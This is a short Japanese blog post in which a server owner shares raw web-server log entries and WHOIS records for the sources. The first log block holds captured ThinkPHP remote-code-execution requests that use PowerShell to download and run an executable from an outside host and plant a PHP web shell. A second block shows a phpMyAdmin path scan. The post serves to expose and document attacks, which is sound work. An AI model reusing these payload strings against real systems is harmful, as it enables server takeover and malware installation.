Webサーバーのログを見ていると、怪しさ満載のアクセス行に気付きましたので、久しぶりにご紹介。
[22/May/2019:22:06:49] - - 221.231.113.114 "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/leepozjimljusrb19143.exe');start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 301 - "http://116.58.172.107:80/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe [22/May/2019:22:06:57] - - 221.231.113.114 "GET /public/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile(http://fid.hognoob.se/download.exe,%SystemRoot%/Temp/leepozjimljusrb19143.exe);start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 404 24979 "http://116.58.172.107:80/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe [22/May/2019:22:07:04] - - 221.231.113.114 "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 301 - "http://116.58.172.107:80/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo [22/May/2019:22:07:07] - - 221.231.113.114 "GET /public/?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20?php%20action%20=%20_GET[xcmd];system(action);?hydra.php HTTP/1.1" 404 24980 "http://116.58.172.107:80/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo [22/May/2019:22:07:15] - - 221.231.113.114 "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/leepozjimljusrb19143.exe');start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 404 24950 "http://116.58.172.107:80/public/hydra.php?xcmd=cmd.exe
/public とback slash があることからWindowsのローカルシェアをターゲットにしたもの?
アクセス元は、予想通り、中国でした。
% Information related to '221.228.0.0/14AS4134' route: 221.228.0.0/14 descr: CHINANET jiangsu province network origin: AS4134 mnt-by: MAINT-CHINANET-JS last-modified: 2019-02-14T06:59:24Z source: APNIC
以下のようなアクセスはしょっちゅうなんですけどね。
[21/May/2019:17:23:52] - - 118.31.251.34 "GET //scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:23:57] - - 118.31.251.34 "GET //phpMyAdm/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:03] - - 118.31.251.34 "GET //admin/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:09] - - 118.31.251.34 "GET //admin/pma/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:15] - - 118.31.251.34 "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:21] - - 118.31.251.34 "GET //db/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:26] - - 118.31.251.34 "GET //dbadmin/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:31] - - 118.31.251.34 "GET //dbdmin/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:36] - - 118.31.251.34 "GET //myadmin/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:41] - - 118.31.251.34 "GET //mysql/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:45] - - 118.31.251.34 "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:49] - - 118.31.251.34 "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:52] - - 118.31.251.34 "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:24:56] - - 118.31.251.34 "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:25:01] - - 118.31.251.34 "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 301 - "-" [21/May/2019:17:25:07] - - 118.31.251.34 "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 301 - "-"
こっちのアクセス元も、当然、中国。
% Information related to '118.31.0.0/16AS37963' route: 118.31.0.0/16 descr: Addresses from CNNIC country: CN origin: AS37963 mnt-by: MAINT-CNNIC-AP last-modified: 2016-07-20T02:08:05Z source: APNIC
どうでもいい話ですが、さらしておきます。